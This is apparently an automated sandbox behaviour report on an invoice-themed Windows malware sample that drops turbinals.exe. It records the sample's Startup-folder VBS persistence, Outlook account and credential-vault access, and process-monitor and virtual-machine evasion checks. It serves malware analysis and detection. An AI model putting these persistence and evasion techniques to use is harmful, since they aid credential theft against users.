Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe | Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe | Section loaded: pstorec.dll
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe | Section loaded: vaultcli.dll
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe | Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe | Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe | Section loaded: pstorec.dll
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe | Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe | Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe | Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: vbscript.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: mlang.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: urlmon.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: wsock32.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: wsock32.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: wsock32.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: wsock32.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeCode function: 0_2_01027A50 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,0_2_01027A50
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeCode function: 0_2_00EF8945 push ecx; ret 0_2_00EF8958
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeCode function: 2_2_00D30080 push eax; iretd 2_2_00D30082
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeCode function: 2_2_00D30079 push eax; iretd 2_2_00D3007A
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeCode function: 2_2_00D3007C push eax; iretd 2_2_00D3007E
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeCode function: 2_2_00D08945 push ecx; ret 2_2_00D08958
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeCode function: 2_2_00CF52AC push edx; iretd 2_2_00CF52D6
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeCode function: 2_2_00CF53C5 push edx; iretd 2_2_00CF53EA
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeCode function: 2_2_00CF53ED push edx; iretd 2_2_00CF53EE
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeCode function: 2_2_00CF53A0 push ecx; iretd 2_2_00CF538A
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeCode function: 2_2_00CF5358 push edx; iretd 2_2_00CF532A
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeCode function: 2_2_00CF5373 push ecx; iretd 2_2_00CF538A
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeCode function: 2_2_00CF5314 push edx; iretd 2_2_00CF532A
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exeCode function: 2_2_00CF169B push ss; iretd 2_2_00CF169C
                    Source: initial sampleStatic PE information: section name: UPX0
                    Source: initial sampleStatic PE information: section name: UPX1
                    Source: initial sampleStatic PE information: section name: UPX0
                    Source: initial sampleStatic PE information: section name: UPX1
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exeFile created: C:\Users\user\AppData\Local\acceptancy\turbinals.exeJump to dropped file

                    Boot Survival

Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\turbinals.vbs
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\turbinals.vbs
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\turbinals.vbs
Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe | Code function: 0_2_00ED48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 0_2_00ED48D7
Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe | Code function: 0_2_00F55376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 0_2_00F55376
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe | Code function: 2_2_00CE48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 2_2_00CE48D7
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe | Code function: 2_2_00D65376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 2_2_00D65376
Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe | Code function: 0_2_00EF3187 RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00EF3187
Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe | Process information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

Source: turbinals.exe, 00000002.00000002.1313569997.00000000010CE000.00000004.00000020.00020000.00000000.sdmp, turbinals.exe, 00000002.00000003.1299290666.000000000105C000.00000004.00000020.00020000.00000000.sdmp, turbinals.exe, 00000002.00000003.1299410643.00000000010CE000.00000004.00000020.00020000.00000000.sdmp, turbinals.exe, 00000009.00000003.1428885907.00000000011AC000.00000004.00000020.00020000.00000000.sdmp, turbinals.exe, 00000009.00000002.1437261623.000000000121E000.00000004.00000020.00020000.00000000.sdmp, turbinals.exe, 00000009.00000003.1429031274.000000000121E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: PROCMON.EXESJ
Source: turbinals.exe, 00000003.00000002.3760107455.00000000015CD000.00000004.00000020.00020000.00000000.sdmp, turbinals.exe, 00000003.00000003.1312007585.00000000015CD000.00000004.00000020.00020000.00000000.sdmp, turbinals.exe, 00000003.00000003.1311883235.000000000155C000.00000004.00000020.00020000.00000000.sdmp, turbinals.exe, 00000009.00000003.1428885907.00000000011AC000.00000004.00000020.00020000.00000000.sdmp, turbinals.exe, 00000009.00000002.1437261623.000000000121E000.00000004.00000020.00020000.00000000.sdmp, turbinals.exe, 00000009.00000003.1429031274.000000000121E000.00000004.00000020.00020000.00000000.sdmp, turbinals.exe, 0000000A.00000002.1447997256.0000000001233000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: PROCMON.EXE
Source: turbinals.exe, 0000000B.00000002.1457731800.000000000119D000.00000004.00000020.00020000.00000000.sdmp, turbinals.exe, 0000000B.00000003.1447910537.000000000112C000.00000004.00000020.00020000.00000000.sdmp, turbinals.exe, 0000000B.00000003.1448090836.000000000119D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: PROCMON.EXE;
Source: turbinals.exe, 0000000D.00000002.1465173386.00000000012FE000.00000004.00000020.00020000.00000000.sdmp, turbinals.exe, 0000000D.00000003.1457043234.000000000128C000.00000004.00000020.00020000.00000000.sdmp, turbinals.exe, 0000000D.00000003.1457205214.00000000012FE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: PROCMON.EXES+
Source: turbinals.exe, 0000000D.00000002.1465173386.00000000012FE000.00000004.00000020.00020000.00000000.sdmp, turbinals.exe, 0000000D.00000003.1457043234.000000000128C000.00000004.00000020.00020000.00000000.sdmp, turbinals.exe, 0000000D.00000003.1457205214.00000000012FE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: PROCMON.EXEM
Source: turbinals.exe, 0000000A.00000002.1448026199.0000000001251000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: PROCMON.EXES]
Source: turbinals.exe, 00000002.00000002.1313569997.00000000010CE000.00000004.00000020.00020000.00000000.sdmp, turbinals.exe, 00000002.00000003.1299290666.000000000105C000.00000004.00000020.00020000.00000000.sdmp, turbinals.exe, 00000002.00000003.1299410643.00000000010CE000.00000004.00000020.00020000.00000000.sdmp, turbinals.exe, 00000003.00000002.3760192225.000000000169F000.00000004.00000020.00020000.00000000.sdmp, turbinals.exe, 0000000B.00000002.1457731800.000000000119D000.00000004.00000020.00020000.00000000.sdmp, turbinals.exe, 0000000B.00000003.1447910537.000000000112C000.00000004.00000020.00020000.00000000.sdmp, turbinals.exe, 0000000B.00000003.1448090836.000000000119D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: PROCMON.EXES
Source: z49FACTURA-0987678.exe, 00000000.00000003.1291243998.000000000124D000.00000004.00000020.00020000.00000000.sdmp, z49FACTURA-0987678.exe, 00000000.00000003.1291126044.00000000011DC000.00000004.00000020.00020000.00000000.sdmp, z49FACTURA-0987678.exe, 00000000.00000002.1299306959.000000000124D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: PROCMON.EXEW
Source: z49FACTURA-0987678.exe, 00000000.00000003.1291243998.000000000124D000.00000004.00000020.00020000.00000000.sdmp, z49FACTURA-0987678.exe, 00000000.00000003.1291126044.00000000011DC000.00000004.00000020.00020000.00000000.sdmp, z49FACTURA-0987678.exe, 00000000.00000002.1299306959.000000000124D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: PROCMON.EXESG
Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe | Window / User API: threadDelayed 568
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe | Window / User API: threadDelayed 8916
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe | Window / User API: foregroundWindowGot 1766
Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe | Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes graph_0-105417
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe | Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe | API coverage: 4.5 %
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe | API coverage: 4.4 %
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe TID: 7800 | Thread sleep time: -118000s >= -30000s
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe TID: 7804 | Thread sleep time: -1704000s >= -30000s
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe TID: 7804 | Thread sleep time: -26748000s >= -30000s
Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe | Code function: 0_2_00F3445A GetFileAttributesW,FindFirstFileW,FindClose, 0_2_00F3445A
Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe | Code function: 0_2_00F3C6D1 FindFirstFileW,FindClose, 0_2_00F3C6D1
Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe | Code function: 0_2_00F3C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 0_2_00F3C75C
Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe | Code function: 0_2_00F3EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00F3EF95
Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe | Code function: 0_2_00F3F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00F3F0F2
Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe | Code function: 0_2_00F3F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_00F3F3F3
Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe | Code function: 0_2_00F337EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_00F337EF
Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe | Code function: 0_2_00F33B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_00F33B12
Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe | Code function: 0_2_00F3BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_00F3BCBC
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe | Code function: 2_2_00D4445A GetFileAttributesW,FindFirstFileW,FindClose, 2_2_00D4445A
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe | Code function: 2_2_00D4C6D1 FindFirstFileW,FindClose, 2_2_00D4C6D1
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe | Code function: 2_2_00D4C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 2_2_00D4C75C
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe | Code function: 2_2_00D4EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 2_2_00D4EF95
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe | Code function: 2_2_00D4F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 2_2_00D4F0F2
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe | Code function: 2_2_00D4F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 2_2_00D4F3F3
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe | Code function: 2_2_00D437EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 2_2_00D437EF
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe | Code function: 2_2_00D43B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 2_2_00D43B12
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe | Code function: 2_2_00D4BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 2_2_00D4BCBC
Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe | Code function: 0_2_00ED49A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_00ED49A0
Source: turbinals.exe, 00000003.00000002.3759331441.0000000001551000.00000004.00000020.00020000.00000000.sdmp, turbinals.exe, 00000003.00000002.3758634982.00000000014F3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: wscript.exe, 00000008.00000002.1428817213.000001C21D2F2000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: bhv7BD7.tmp.5.dr | Binary or memory string: https://r.bing.com/rb/18/jnc,nj/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w
Source: turbinals.exe, 00000003.00000002.3759331441.0000000001551000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW>
Source: bhv7BD7.tmp.5.dr | Binary or memory string: https://config.edge.skype.com/config/v1/Skype/1446_8.53.0.77?OSVer=10.0.19045.2006&ClientID=RHTiQUpXOaQeBtbq%2B7LgJauNdx5lF%2FQ%2FOy2qwXRNGjU%3D&Manufacturer=VMware%2C%20Inc.&Model=VMware20%2C1&Language=en&Locale=en-US
Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe | API call chain: ExitProcess graph end node graph_0-104255
Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe | API call chain: ExitProcess graph end node graph_0-104100
Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe | API call chain: ExitProcess graph end node graph_0-104321
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe | API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe | API call chain: ExitProcess graph end node
